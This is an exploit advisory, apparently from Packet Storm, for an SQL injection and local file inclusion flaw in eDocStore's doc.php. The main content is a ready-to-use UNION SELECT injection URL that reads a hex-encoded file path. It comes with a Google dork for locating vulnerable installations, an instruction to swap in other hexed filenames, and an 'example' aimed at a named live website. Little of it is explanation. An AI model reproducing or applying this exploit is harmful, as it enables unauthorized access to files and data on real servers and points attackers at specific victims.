eDocStore suffers from a remote SQL injection vulnerability in doc.php.
e3be96d036a42982f6fb79111cf74e992a897d3c5b2112c827677d91a90d247e--==+================================================================================+==--
--==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog (good work xprog)
SCRIPT DOWNLOAD: N/A
SITE: http://www.edocstore.co.uk
DORK: intext:"Powered by eDocStore"
EXPLOITS:
EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null
EXAMPLES:
EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null
Note/Tip: The filename for the incluson has got to be hexed before you can include it.
Its only required to replace the first hex value before the ","
GREETZ: h4cky0u.org, G0t-Root.Net
FROM GM: Kw3[R]ln Get over it!
--==+================================================================================+==--
--==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==--
--==+================================================================================+==--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed